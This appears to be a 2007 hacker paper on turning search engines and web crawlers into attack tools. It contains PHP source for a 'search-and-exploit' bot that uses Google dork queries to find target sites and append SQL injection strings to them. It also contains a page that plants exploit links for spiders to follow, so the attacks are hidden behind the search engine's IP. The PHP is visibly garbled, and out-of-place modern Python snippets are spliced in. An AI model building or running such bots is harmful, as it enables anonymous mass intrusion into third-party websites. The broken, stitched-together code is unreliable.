Posted May 17, 2007
Authored by crossbower | Site playhack.net

I, Bot, Taking Advantage Of Robots Power. A response to the original bot related article in Phrack written by Michal Zalewski.

tags | paper
MD5 | 50a152ffdd28969e6ad885b444f34b17


Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski

Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net

Date: 2007-04-18


-[ SUMMARY ]---------------------------------------------------------------------

0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion


---[ 0x00: Intro, let's start ]

Hello everybody. I apologize for my poor English; it is not my
first language. I hope you will excuse any errors ;)

This paper is a reply to an article published in Phrack by Michal Zalewski.
He was the first to consider the possibility of taking advantage of the multitude
of robots that scan the web at every moment in search of information.
We begin with the introduction to Zalewski's article, then we will see how
to implement his ideas by writing our own bots.

"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.

Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.

Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."

Now let's see how all this is possible in practice ;) Have fun!


---[ 0x01: Abstract ]

The idea that search engines (Google first of all) could be turned into
powerful weapons in the hands of attackers is not new.
Google hacking, search dorks and cache digging are all techniques that take
advantage of a small part of what the engines know, but very few people,
until now, have thought of using their most sensitive and powerful part,
the robot... and this is the topic of this article.

A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.
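
To make "retrieving all documents that are referenced" concrete, here is a
minimal sketch in Python of the step that finds the references in a page.
The names LinkExtractor and extract_links are chosen for this illustration
only, and the sketch looks just at <a href="..."> tags; a real robot would
also handle frames, redirects and other kinds of reference.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class LinkExtractor(HTMLParser):
    """Collect the absolute URLs referenced by <a href="..."> tags."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser reports tag and attribute names in lowercase.
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                # Resolve relative references against the page URL.
                self.links.append(urljoin(self.base_url, value))


def extract_links(base_url, html):
    """Return the list of URLs that the given HTML page links to."""
    parser = LinkExtractor(base_url)
    parser.feed(html)
    return parser.links


# Hypothetical page content, used only for the example.
PAGE = '<a href="a.html">A</a> <a href="/b">B</a> <A HREF="http://example.org/">C</A>'
links = extract_links("http://example.com/dir/page.html", PAGE)
print(links)
```

A browser performs this same step only when a human clicks a link; a robot
feeds every extracted URL back into its own list of documents to fetch.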

Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This is not the case; a robot simply visits sites
by requesting documents from them.

What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring

How many robots circulate in the web?

For a complete overview you can consult the list of active bots (see "The Web
Robots Database" among the documents listed in the conclusion).
We will not go deeper, because this topic is outside the scope of the article.

---[ 0x02: Implementation ]

What are the strong points of a bot?
Surely its speed: the ability to execute a great number of operations in a
short time.
For exploitation, we can write a bot with a mirroring-like function that,
using the information found in a database or in a search engine, can complete
mass penetrations without scanning a great number of useless targets.

A first (and simple) implementation is this script. It queries a search
engine such as Google (or another) and builds an array with the addresses
of sites that contain certain web pages. If enabled, it can automatically exploit
many types of vulnerabilities (for example SQL injection).
Although it is a simple script, it can become a destructive weapon if used in the
wrong way (ok noob?).
I therefore ask any lamers among the readers not to use it to cause damage. It is
only a Proof of Concept.

- - - - -

code: - - - - -


echo "
--- Google Finder ---
Automatic SaE (search-and-exploit) Bot
by Crossbower <crossbower AT katamail DOT com>


if ($argc<2) {
echo "Usage: ".$argv[0]." <string> <result>
".$argv[0]." /script/vuln.php?cmd= 30



$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function SendPack($packet)
global $proxy, $host, $port, $proxy_regex;

if ($proxy=='') {
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
if (!$ock) {
echo 'No response from proxy...';die;
if ($proxy=='') {
while (!feof($ock)) {
else {
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) {

//Global variables
$host="www.google.com"; //Our vulnerability database ;)
$path=$argv[1]; //String
$port=80; //Port (Web)
$proxy=""; //For your proxy
$html; //Buffer for result

//Google variables
$SeInurl="/search?q=inurl%3A"; //Search inurl
$SeType="&btnG=Search"; //Search type
if ($argv[2]) $SeNumber="&num=".$argv[2];
else $SeNumber="&num=20"; //Number of result

if ($path[0]<>'/') {print("*warning: string must begin with '/'\n");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

//$path=urlencode($path); //Url encoding

echo "1: Find Targets...\n\n";
//Google's inurl search (example):

/* Make and Send Query */
$packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";


/* Find targets urls */
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);
for ($i=0; $i<count($match[1]); $i++)
if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache")) echo $match[1][$i]."\n";

/* This code is for exploiting targets. It's Prof of Concept and it isn't complete.
Don't use for laming

$ExplString="?var=" //String for exploiting. Good for sql injection.

for ($i=0; $i<count($match[1]); $i++)
if (strstr($match[1][$i],$path) && !strstr($match[1][$i],"google") && !strstr($match[1][$i],"cache"))


// Make and Send Exploit
$packet ="GET ".$match[1][$i].$ExplString." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";


if (strstr($buffer,$success)) //If the result is positive
// Print result
echo $buffer;


- - - - -

- - - - -


---[ 0x03: The code: Paranoid Android ]

Now let's try to implement different code: code that uses the crawlers of
search engines in a truly new way.

The operation of a crawler is simple:
In general, it starts with a list of URLs to visit, called the "seeds".
As the crawler visits these URLs, it identifies all the hyperlinks in the page
and adds them to the list of URLs to visit, called the "crawl frontier".
URLs from the frontier are recursively visited according to a set of policies.
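
The seed and frontier mechanism described above can be sketched in a few
lines of Python. This is only an illustration under stated assumptions: the
"web" is a hypothetical in-memory dictionary instead of real pages, the
function name crawl and its parameters are invented for the example, and the
only policies are a visit limit and a caller-supplied allowed() check.

```python
from collections import deque


def crawl(seeds, get_links, allowed, max_pages=100):
    """Visit URLs breadth-first, starting from the seeds.

    get_links(url) returns the URLs referenced by a page;
    allowed(url) is the policy deciding whether a URL may be visited.
    """
    frontier = deque(seeds)  # URLs waiting to be visited (the crawl frontier)
    seen = set(seeds)        # URLs already queued, so loops are not followed twice
    visited = []             # URLs in the order they were actually visited

    while frontier and len(visited) < max_pages:
        url = frontier.popleft()
        if not allowed(url):
            continue
        visited.append(url)
        for link in get_links(url):
            if link not in seen:
                seen.add(link)
                frontier.append(link)
    return visited


# Hypothetical in-memory "web": page -> pages it links to.
WEB = {
    "a": ["b", "c"],
    "b": ["c", "d"],
    "c": ["a"],
    "d": [],
}

# Policy for the example: every page may be visited except "d".
order = crawl(["a"], lambda u: WEB.get(u, []), lambda u: u != "d")
print(order)  # ['a', 'b', 'c']
```

The point to notice is that the crawler itself never chooses its targets:
whatever a visited page links to ends up in the frontier, unless a policy
rejects it.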

As we can see, this method depends closely on the contents of a web page,
which can send the crawler off to explore numerous other links.
Now we ask ourselves: how safe is this type of method?

Suppose that a visited website contains exploit links (for example, SQL injection)
that call dynamic pages of other websites. What happens in this case?
The heuristic spider follows the links and so injects code into those websites.
Then it saves all the results in the database of its search engine.
Isn't it fantastic? ;)

And which IP remains in the logs? The IP of the search engine, which, with the many
sites its spider visits every day, will have a hard job finding our malicious
site. If it is willing to search at all...
In any case, even if our site is uncovered, how many further searches are necessary
to find the culprit?
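
From the side of the visited site, the point about logs can be illustrated
with a small Python sketch that parses one access log entry. Everything here
is an assumption made for the example: the entry is invented, it uses the
common "combined" log layout, the address comes from a documentation range,
and "ExampleBot" is not a real crawler.

```python
import re

# One entry in the "combined" access log layout (hypothetical sample data).
SAMPLE = (
    '192.0.2.10 - - [18/Apr/2007:10:00:00 +0000] '
    '"GET /page.php?id=1 HTTP/1.0" 200 512 "-" "ExampleBot/1.0"'
)

LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<protocol>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def parse_line(line):
    """Return the fields of a combined-format log line, or None if it does not match."""
    match = LOG_PATTERN.fullmatch(line)
    return match.groupdict() if match else None


entry = parse_line(SAMPLE)
print(entry["ip"], entry["agent"], entry["referer"])
```

In this sample the only identity recorded is the robot's address and user
agent, and the referer field is empty, so nothing in the entry points back
to the page that published the link.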

Now, because code is worth more than a thousand words, here is a robot that, if
configured correctly, can use the techniques described in this article.

Voilà Paranoid Android:

- - - - -

code: - - - - -

<TITLE>Paranoid Android, By Crossbower</TITLE>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<META HTTP-EQUIV="Content-Language" CONTENT=en>
<META name="Keywords" content="Search Bot, ParAnd. PA Robot.">


//Main settings
$string="vuln.php"; //Define the url or the vulnerabilities to try
$exploit="?a='SQL"; //Define the exploit for the vulnerabilities
$LogFile="BotLog.html"; //Log file

//Global variables
$host="www.google.com"; //Our vulnerability database ;)
$port=80; //Port (Web)
$html; //Buffer for result

//Google variables
$SeInurl="/search?q=inurl%3A"; //Search inurl
$SeCache="/search?q=cache%3A"; //Search cache
$SeType="&btnG=Search"; //Search type
$SeNumber="&num=5"; //Number of result

Google's inurl search (example):

//$string=urlencode($string); //Url encoding


echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
--- PARANOID ANDROID --- <br>&nbsp;
Automatic SaE (search-and-exploit) Bot <br>&nbsp;&nbsp;
by Crossbower Crossbower*katamail*com <br>

<Thanks to: Radiohead, for the music and the name>


function SendPack($packet)
global $host, $port;

if (!$ock) {
echo 'No response from '.$host.':'.$port; die;


while (!feof($ock)) {


/* Make and Send Query */
$packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";


//Open log file
$handle =fopen($LogFile,'a');

//Inizialize the log
fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."<br><br>\n");
fwrite($handle,"Visited by:<br>\n");

$Spider =$REMOTE_HOST."<br>".$REMOTE_ADDR."<br>";

fwrite($handle,"Links (google cache):<br>\n");

$Log ="<a href=\"";

//Find targets
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match);

for ($i=0; $i<count($match[1]); $i++) {
//Select the result:
if ( strstr($match[1][$i],$string) &&
!strstr($match[1][$i],"google") &&
echo "<a href=\"".$match[1][$i].$exploit."\">".$match[1][$i].$exploit."</a><br>\n";

//Update log

//Close log


- - - - -

- - - - -


---[ 0x04: Conclusion ]

I hope this information has interested you and has made you understand
the gravity of the attacks that robots may make possible in the future...

To go deeper, you can read these documents:

- "Against the System: Rise of the Robots" by Michal Zalewski

- "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University

- Proprietary web solutions security, Michal Zalewski

- "A Standard for Robot Exclusion", Martijn Koster

- "The Web Robots Database"

- "Web Security FAQ", Lincoln D. Stein

OK, that's all, folks...
For clarifications, questions or anything else, don't hesitate to mail me ;)

Crossbower - crossbower#katamail.com
Site: http://www.playhack.net
